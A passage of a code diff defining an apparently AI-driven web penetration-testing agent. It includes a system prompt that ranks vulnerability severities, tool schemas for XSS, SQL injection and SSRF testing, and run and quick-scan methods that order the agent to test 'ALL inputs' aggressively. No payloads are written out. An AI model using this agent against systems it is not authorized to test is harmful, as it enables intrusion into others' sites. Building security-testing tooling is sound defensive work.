- Check vertical privilege escalation
|
|
622
|
+
|
|
623
|
+
### Phase 5: Business Logic
|
|
624
|
+
- Test workflow bypasses
|
|
625
|
+
- Check for race conditions
|
|
626
|
+
- Test input validation on client vs server
|
|
627
|
+
|
|
628
|
+
## VULNERABILITY PRIORITIES
|
|
629
|
+
|
|
630
|
+
1. **CRITICAL**: RCE, SQLi with data extraction, Auth bypass
|
|
631
|
+
2. **HIGH**: Stored XSS, SSRF, Path traversal with file read
|
|
632
|
+
3. **MEDIUM**: Reflected XSS, CSRF, Info disclosure
|
|
633
|
+
4. **LOW**: Missing security headers, clickjacking
|
|
634
|
+
|
|
635
|
+
## OUTPUT FORMAT
|
|
636
|
+
|
|
637
|
+
Use report_web_finding for each vulnerability with:
|
|
638
|
+
- Clear, specific title
|
|
639
|
+
- Accurate severity
|
|
640
|
+
- Working payload
|
|
641
|
+
- Evidence (request/response)
|
|
642
|
+
- Specific remediation
|
|
643
|
+
|
|
644
|
+
Be thorough and aggressive. Test ALL inputs. Check ALL pages."""
|
|
645
|
+
|
|
646
|
+
|
|
647
|
+
class WebPentestAgent(BaseSecurityAgent):
    """
    AI-powered web application penetration testing agent.

    Performs comprehensive web security testing including:
    - Site spidering and reconnaissance
    - Injection testing (XSS, SQLi, SSRF, etc.)
    - Authentication and authorization testing
    - Security header analysis

    Two entry points are provided: ``run()`` for a full, exhaustive test
    and ``quick_scan()`` for a step-capped pass over high-priority issues.

    Usage:
        agent = WebPentestAgent(target="https://example.com")
        result = await agent.run()
    """
def __init__(
|
|
663
|
+
self,
|
|
664
|
+
target: str,
|
|
665
|
+
config: Optional[AgentConfig] = None,
|
|
666
|
+
cookies: Optional[Dict[str, str]] = None,
|
|
667
|
+
auth_token: Optional[str] = None,
|
|
668
|
+
scope: Optional[List[str]] = None
|
|
669
|
+
):
|
|
670
|
+
"""
|
|
671
|
+
Initialize the web pentest agent.
|
|
672
|
+
|
|
673
|
+
Args:
|
|
674
|
+
target: Target URL to test
|
|
675
|
+
config: Agent configuration
|
|
676
|
+
cookies: Session cookies for authenticated testing
|
|
677
|
+
auth_token: Bearer token for API authentication
|
|
678
|
+
scope: List of URL patterns that are in scope
|
|
679
|
+
"""
|
|
680
|
+
super().__init__(config)
|
|
681
|
+
self.target = target.rstrip('/')
|
|
682
|
+
self.cookies = cookies or {}
|
|
683
|
+
self.auth_token = auth_token
|
|
684
|
+
self.scope = scope or [urlparse(target).netloc]
|
|
685
|
+
|
|
686
|
+
def get_system_prompt(self) -> str:
|
|
687
|
+
"""Get the web pentest system prompt."""
|
|
688
|
+
prompt = WEB_PENTEST_SYSTEM_PROMPT
|
|
689
|
+
|
|
690
|
+
if self.scope:
|
|
691
|
+
prompt += f"\n\n## SCOPE\nOnly test these domains: {', '.join(self.scope)}"
|
|
692
|
+
|
|
693
|
+
return prompt
|
|
694
|
+
|
|
695
|
+
def get_tools(self) -> List[Dict[str, Any]]:
|
|
696
|
+
"""Get tools available for web pentesting."""
|
|
697
|
+
return [
|
|
698
|
+
{
|
|
699
|
+
"name": "fetch_page",
|
|
700
|
+
"description": "Fetch a web page and analyze its content",
|
|
701
|
+
"parameters": {
|
|
702
|
+
"url": {"type": "string", "description": "URL to fetch"},
|
|
703
|
+
"headers": {"type": "object", "description": "Optional headers"},
|
|
704
|
+
"method": {"type": "string", "description": "HTTP method"}
|
|
705
|
+
},
|
|
706
|
+
"required": ["url"]
|
|
707
|
+
},
|
|
708
|
+
{
|
|
709
|
+
"name": "spider_site",
|
|
710
|
+
"description": "Spider a website to discover pages and endpoints",
|
|
711
|
+
"parameters": {
|
|
712
|
+
"start_url": {"type": "string"},
|
|
713
|
+
"max_pages": {"type": "integer"},
|
|
714
|
+
"same_domain": {"type": "boolean"}
|
|
715
|
+
},
|
|
716
|
+
"required": ["start_url"]
|
|
717
|
+
},
|
|
718
|
+
{
|
|
719
|
+
"name": "test_xss",
|
|
720
|
+
"description": "Test for XSS vulnerabilities",
|
|
721
|
+
"parameters": {
|
|
722
|
+
"url": {"type": "string"},
|
|
723
|
+
"param": {"type": "string"},
|
|
724
|
+
"method": {"type": "string"}
|
|
725
|
+
},
|
|
726
|
+
"required": ["url", "param"]
|
|
727
|
+
},
|
|
728
|
+
{
|
|
729
|
+
"name": "test_sqli",
|
|
730
|
+
"description": "Test for SQL injection",
|
|
731
|
+
"parameters": {
|
|
732
|
+
"url": {"type": "string"},
|
|
733
|
+
"param": {"type": "string"},
|
|
734
|
+
"method": {"type": "string"}
|
|
735
|
+
},
|
|
736
|
+
"required": ["url", "param"]
|
|
737
|
+
},
|
|
738
|
+
{
|
|
739
|
+
"name": "test_ssrf",
|
|
740
|
+
"description": "Test for SSRF vulnerabilities",
|
|
741
|
+
"parameters": {
|
|
742
|
+
"url": {"type": "string"},
|
|
743
|
+
"param": {"type": "string"},
|
|
744
|
+
"callback_url": {"type": "string"}
|
|
745
|
+
},
|
|
746
|
+
"required": ["url", "param"]
|
|
747
|
+
},
|
|
748
|
+
{
|
|
749
|
+
"name": "report_web_finding",
|
|
750
|
+
"description": "Report a web security vulnerability",
|
|
751
|
+
"parameters": {
|
|
752
|
+
"title": {"type": "string"},
|
|
753
|
+
"severity": {"type": "string"},
|
|
754
|
+
"vuln_type": {"type": "string"},
|
|
755
|
+
"url": {"type": "string"},
|
|
756
|
+
"description": {"type": "string"},
|
|
757
|
+
"payload": {"type": "string"},
|
|
758
|
+
"evidence": {"type": "string"},
|
|
759
|
+
"remediation": {"type": "string"},
|
|
760
|
+
"cwe": {"type": "string"}
|
|
761
|
+
},
|
|
762
|
+
"required": ["title", "severity", "vuln_type", "url", "description", "payload", "evidence", "remediation"]
|
|
763
|
+
}
|
|
764
|
+
]
|
|
765
|
+
|
|
766
|
+
async def run(self, initial_message: Optional[str] = None) -> AgentResult:
|
|
767
|
+
"""
|
|
768
|
+
Run the web penetration test.
|
|
769
|
+
|
|
770
|
+
Args:
|
|
771
|
+
initial_message: Optional additional instructions
|
|
772
|
+
|
|
773
|
+
Returns:
|
|
774
|
+
AgentResult with all security findings
|
|
775
|
+
"""
|
|
776
|
+
message = f"""Perform comprehensive web application penetration testing on: {self.target}
|
|
777
|
+
|
|
778
|
+
Testing Process:
|
|
779
|
+
1. First, fetch the main page to analyze the application
|
|
780
|
+
2. Spider the site to discover all pages and parameters
|
|
781
|
+
3. Test each parameter for XSS vulnerabilities
|
|
782
|
+
4. Test each parameter for SQL injection
|
|
783
|
+
5. Test URL parameters for SSRF
|
|
784
|
+
6. Analyze security headers
|
|
785
|
+
7. Report all findings
|
|
786
|
+
|
|
787
|
+
{f'Use cookies for authenticated testing: {json.dumps(self.cookies)}' if self.cookies else ''}
|
|
788
|
+
{f'Use auth token: {self.auth_token}' if self.auth_token else ''}
|
|
789
|
+
|
|
790
|
+
{initial_message or ''}
|
|
791
|
+
|
|
792
|
+
Begin testing now. Be thorough and test ALL discovered inputs."""
|
|
793
|
+
|
|
794
|
+
return await super().run(message)
|
|
795
|
+
|
|
796
|
+
async def quick_scan(self) -> AgentResult:
|
|
797
|
+
"""
|
|
798
|
+
Perform a quick security scan.
|
|
799
|
+
|
|
800
|
+
Returns:
|
|
801
|
+
AgentResult with high-priority findings
|
|
802
|
+
"""
|
|
803
|
+
original_max_steps = self.config.max_steps
|
|
804
|
+
self.config.max_steps = min(25, original_max_steps)
|
|
805
|
+
|
|
806
|
+
try:
|
|
807
|
+
message = f"""Perform a QUICK security scan of: {self.target}
|
|
808
|
+
|
|
809
|
+
Focus on high-priority vulnerabilities only:
|
|
810
|
+
1. Fetch the main page and check security headers
|
|
811
|
+
2. Test 2-3 most important parameters for XSS and SQLi
|
|
812
|
+
3. Check for obvious misconfigurations
|
|
813
|
+
|
|
814
|
+
Do not spider the entire site. Focus on finding critical issues fast."""
|
|
815
|
+
|
|
816
|
+
return await super().run(message)
|
|
817
|
+
finally:
|
|
818
|
+
self.config.max_steps = original_max_steps
|